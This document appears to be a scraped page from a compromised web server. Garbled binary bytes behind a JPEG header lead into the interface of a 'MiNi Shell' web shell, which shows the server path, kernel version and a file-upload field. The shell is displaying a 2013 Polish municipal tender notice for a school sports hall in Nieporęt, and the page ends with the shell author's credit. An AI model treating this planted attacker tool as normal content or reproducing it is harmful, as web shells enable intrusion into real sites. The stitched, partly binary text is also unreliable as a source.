JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/43158-N-2013.html

<p class="kh_header"><b>Nieporęt: Budowa sali sportowej przy Szkole Podstawowej w Nieporęcie</b><br>
<b>Numer ogłoszenia: 43158 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nieporęt reprezentowana przez Wójta , Pl. Wolności 1, 05-126 Nieporęt, woj. mazowieckie, tel. 022 7670416, 7670442, faks 022 7670441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nieporet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali sportowej przy Szkole Podstawowej w Nieporęcie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa sali sportowej przy Szkole Podstawowej w Nieporęcie - zgodnie z pozwoleniem na budowę nr 474/12 z dnia 16.04.2012 r. wydanym przez Starostę Powiatu Legionowskiego oraz rozbudowa z przebudową budynku Szkoły Podstawowej w Nieporęcie, ul. Dworcowa 9, działka nr 270/7 -  zgodnie z pozwoleniem na budowę nr 1459/12 z dnia 12.10.2012 r. wydanym przez Starostę Powiatu Legionowskiego. 
Na terenie działki objętej przedmiotem zamówienia obecnie znajdują się budynki: Szkoły Podstawowej, budynek istniejącej sali sportowej i budynek gospodarczy (po nieistniejącej hydroforni) - budynek istniejącej sali sportowej oraz budynek gospodarczy przeznaczone są do rozbiórki. W granicach działki znajdują się również: boisko szkolne o nawierzchni poliuretanowej oraz boisko o nawierzchni asfaltowej (boisko asfaltowe przeznaczone do likwidacji), a także ogrodzenie z przęseł metalowych na podmurówce po nieistniejącym placu zabaw we frontowej części działki (również przeznaczone do likwidacji), parking rowerowy (do przeniesienia wg wskazań Zamawiającego) oraz nieutwardzony parking.
1. Część I - Budowa sali sportowej:
Budynek sali sportowej, którego budowa stanowi przedmiot niniejszego zamówienia to: 
Budynek sali gimnastycznej wraz z częścią socjalną. Budynek sali jest to budynek częściowo dwukondygnacyjny niepodpiwniczony w kształcie prostokąta. Na parterze budynku będzie arena sali sportowej wraz z widownią na 150 osób (trybuny składane), szatnie dla chłopców oraz dziewcząt z zapleczem socjalnym, pokój trenerów, magazyn sprzętu oraz szatnia szkolna. Na piętrze będą dwa zespoły szatniowe z węzłem sanitarnym, pomieszczenia techniczne, salka korekcyjna oraz świetlica szkolna. Na piętro będą prowadziły dwie klatki schodowe w tym jedna zewnętrzna. Dostęp do budynku umożliwią trzy wyjścia - od ulicy Dworcowej - wejście główne, od strony boisk (północnej) oraz od strony kanału (wschodniej). Dodatkowo do części sportowej budynku można będzie dostać się bezpośrednio z budynku szkoły za pomocą łącznika wchodzącego w zakres budowy. Ponadto, w ramach budowy należy dostarczyć i zamontować wyposażenie obiektu. Parametry techniczne:
a)	Długość budynku - 51,61 m
b)	Szerokość budynku - 24,24 m
c)	Powierzchnia użytkowa - 1485,27 m2
d)	Powierzchnia zabudowy - 1228,92 m2
e)	Kubatura - 9456,23 m3.
Zagospodarowanie terenu zewnętrznego:
Zagospodarowanie terenu obejmuje działkę 270/7 będącą własnością Gminy Nieporęt. Na terenie działki należy wykonać 22 miejsca postojowe w tym 2 dla osób niepełnosprawnych oraz ciągi pieszo-jezdne wykonane z kostki brukowej gr. 8cm. Należy wykonać ogrodzenie działki od strony kanału (wschodniej) z elementów panelowych. Po wykonaniu robót budowlanych cały teren działki należy obsiać trawą. Należy umieścić elementy małej architektury (np. ławki, kosze). Na terenie działki należy wykonać dwa boiska do gry w tenisa ziemnego o nawierzchni z tzw. mączki ceglanej o wymiarach 23,77x10,97 przystosowane do gry w debla i miksta oraz dwa boiska do Sqasha na północnej ścianie projektowanej sali sportowej. 
Przedmiot tej części zamówienia obejmuje również następujące roboty: 
1)	rozbiórka istniejącej sali sportowej wraz z łącznikiem, budynku gospodarczego (po nieistniającej hydroforni), ogrodzenia nieistniejącego placu zabaw oraz asfaltowego boiska,
2)	instalacje elektryczne, teletechniczne i odgromowe,
3)	instalacje wodno-kanalizacyjne wraz z przyłączami do obiektu,
4)	instalacje wentylacji mechanicznej,
5)	instalacje c.o.,
6)	instalacje alarmowe i monitoringu wizyjnego,
7)	rozbudowę istniejącej kotłowni gazowej,
8)	wycinkę drzew kolidujących z inwestycją wraz z usunięciem ich karp,
9)	przeniesienie z istniejącej szatni szkolnej znajdującej się w łączniku przeznaczonym do rozbiórki wyposażenia szatniowego, w miejsce na terenie Szkoły Podstawowej w Nieporęcie wskazane przez Zamawiającego.
2. Cześć II - Rozbudowa z przebudową budynku Szkoły Podstawowej:
Budynek szkoły jest to obiekt dwukondygnacyjny, podpiwniczony z dachem płaskim, w kształcie litery L. Parametry techniczne: 
1)	Długość budynku - 47,01 m
2)	Szerokość budynku - 18,44 m
3)	Powierzchnia użytkowa - 2050,38 m2
4)	Powierzchnia zabudowy - 1075,69 m2
5)	Kubatura - 6179,08 m3.
Rozbudowa i przebudowa budynku szkoły obejmuje następujące roboty:
1)	rozbudowa klatki schodowej łączącej się z nowobudowaną salą sportową,
2)	zabudowa schodów zewnętrznych do oddziału przedszkolnego i kuchni,
3)	ocieplenie budynku i wykonanie elewacji tynkiem strukturalnym malowanym farbą silikonową oraz płytkami klinkierowymi o wymiarach 25x6cm,
4)	wymiana pokrycia dachu papą termozgrzewalną,
5)	wymiana i montaż wszystkich instalacji (w tym: instalacji elektrycznych, wodno-kanalizacyjnych, c.o., gazowych, wentylacji mechanicznej, informatycznych, telekomunikacyjnych, monitoringu, odgromowych),
6)	przebudowa pomieszczeń (przebudowa ścian) sanitariatów, kuchni, oddziału przedszkolnego i piwnicy,
7)	wymiana wszystkich posadzek, okładzin ściennych i stolarki okiennej i drzwiowej,
8)	przebudowa kotłowni.

3. Zamówienie obejmuje także obowiązki Wykonawcy polegające na:
1) powierzeniu kierowania robotami kierownikowi budowy, posiadającemu odpowiednie      uprawnienia budowlane w specjalności:
     a) konstrukcyjno-budowlanej, 
     b) instalacyjnej w zakresie instalacji elektrycznych, 
     c) instalacyjnej w zakresie instalacji i urządzeń sanitarnych, gazowych, wentylacyjnych,
     d) budowy dróg,
2)	zapewnieniu obsługi geodezyjnej i wykonanie inwentaryzacji geodezyjnej;
3)	zapewnieniu niezbędnych mediów do należytego prowadzenia budowy (w tym zapewnieniu zasilania elektrycznego na potrzeby budowlane - prąd budowlany);
4)	uzyskaniu w imieniu inwestora częściowych oraz ostatecznej decyzji o pozwoleniu na użytkowanie wybudowanego i przebudowanego obiektu.
4. Realizacja przedmiotu zamówienia (na etapie prac ziemnych) przeprowadzona będzie pod stałym nadzorem archeologa.
5. Jako  zasadę przyjmuje się wymóg, iż w ofercie  należy przyjąć stosowanie materiałów i urządzeń  spełniających normy i parametry techniczne wyspecyfikowane w dokumentacji  projektowej oraz w Specyfikacji technicznej  wykonania i odbioru robót budowanych, nie gorsze w zakresie parametrów  technicznych i jakościowych od urządzeń wskazanych w tej dokumentacji technicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.11.00.00-1, 45.21.42.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 200 000,- zł (słownie: dwieście tysięcy złotych).
2.Wadium należy wnieść w jednej lub kilku następujących formach art.45 ustawy: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art.  6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.  o utworzeniu Polskiej Agencji Rozwoju przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm..
3.Dokumenty, o których mowa w ust. 2 pkt 2 - 5, muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, przy czym: 
w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich,
dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz zamawiającego bezwarunkowo, tzn. bez konieczności wykazania istnienia roszczenia i bez stawiania warunków do uzyskania roszczenia, oraz na pierwsze żądanie i nieodwołalnie.
dokumenty te zostaną złożone w oryginale. 
4.Dokumenty, o których mowa w ust. 2 pkt 2 - 5, należy złożyć w siedzibie Zamawiającego przed upływem terminu składania ofert lub wraz z ofertą.
5.Wadium wniesione w pieniądzu należy wpłacić na konto Urzędu Gminy w Banku Spółdzielczym w Legionowie O/Nieporęt nr 25 8013 1029 2003 0003 7415 0002. Kopię dowodu wpłaty lub przelewu wadium na konto Zamawiającego należy dołączyć do oferty przetargowej.
6.Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi wykazać, że w ciągu ostatnich 5 lat,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwa podobne zamówienia, co do których  uzyskano ostateczną decyzję o pozwoleniu na  użytkowanie, tzn. budowę obiektów pełniących funkcję użyteczności publicznej o kubaturze budynku nim. 10 000 m3 wraz z zagospodarowaniem terenu przyległego o łącznej wartości nim. 8 000 000 zł brutto wraz z załączeniem dokumentów potwierdzających, że roboty zostały wykonane terminowo i należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Wykonawca  musi dysponować lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia co najmniej 4 osób,  w tym:
- kierownika budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, 
- specjalistę ds. elektrycznych posiadającego uprawnienia w zakresie instalacji elektrycznych,
- specjalistę ds. sanitarnych posiadającego uprawnienia  w zakresie instalacji  sanitarnych, wentylacyjnych, gazowych,  
- specjalistę ds. drogowych posiadającego uprawnienia w zakresie budowy dróg.
b)	Wykonawca musi zatrudniać w ciągu ostatnich trzech lat minimum 100 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Wykonawca musi wykazać, że jest ubezpieczony w zakresie prowadzonej działalności gospodarczej od odpowiedzialności cywilnej na kwotę co najmniej  5 000 000zł (słownie: pięć miliony zł);
b)	Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową w wysokości  min. 10 000 000 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oryginał oświadczenia o ewentualnym powierzeniu części zamówienia podwykonawcom;
b)	wzór umowy (z parafką na każdej stronie) podpisany przez Wykonawcę;
c)	formularz cenowy wykonany w formie kosztorysu ofertowego, sporządzonego metodą uproszczoną, stanowiący podstawę określenia ofertowej kwoty wynagrodzenia ryczałtowego oraz bazę kosztowo - cenową (podstawę) dla wyceny przedmiaru, z zastrzeżeniem że w formularzu cenowym  musi być uwzględniony koszt wszystkich robót, materiałów i urządzeń przewidzianych w dokumentacji projektowej oraz w niniejszej specyfikacji;
d)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; jeżeli wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
2.	Konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie.
3.	W przypadku  zaistnienia  okoliczności, których nie można było przewidzieć w chwili zawarcia umowy Zamawiający dopuszcza możliwość zmiany terminu realizacji przedmiotu zamówienia, o ile okoliczności te skutkują brakiem możliwości wykonania zamówienia w terminie. Okolicznościami  takimi  będą w szczególności: warunki atmosferyczne, warunki terenowe, awarie, katastrofy, akty wandalizmu, konieczność przeprowadzenia badań archeologicznych/wykopaliskowych.
4.	Na wniosek Wykonawcy, w trakcie  prowadzenia  inwestycji, możliwa jest zmiana technologii wykonywania robót. Zmiana jest dopuszczalna jedynie w przypadku gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie, jakościowo i technicznie od przewidzianego w projekcie a jednocześnie  nie spowoduje  zwiększenia  kosztów inwestycji. Wykonawca  zobowiązany jest przedstawić  projekt zamienny zawierający opis proponowanych zmian, rysunki i wycenę kosztów. Projekt  zamienny wymaga  akceptacji nadzoru autorskiego. Zmiany te nie mogą powodować zwiększenia wynagrodzenia Wykonawcy.
5.	W przypadku  gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, Zamawiający sporządza protokół konieczności a następnie dostarcza Wykonawcy dokumentację  projektową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nieporet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nieporęt
Plac Wolności 2a
05-126 Nieporęt
Dział Inwestycji i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2013 godzina 08:30, miejsce: Ofertę należy złożyć w Kancelarii Urzędu Gminy Nieporęt pok. nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com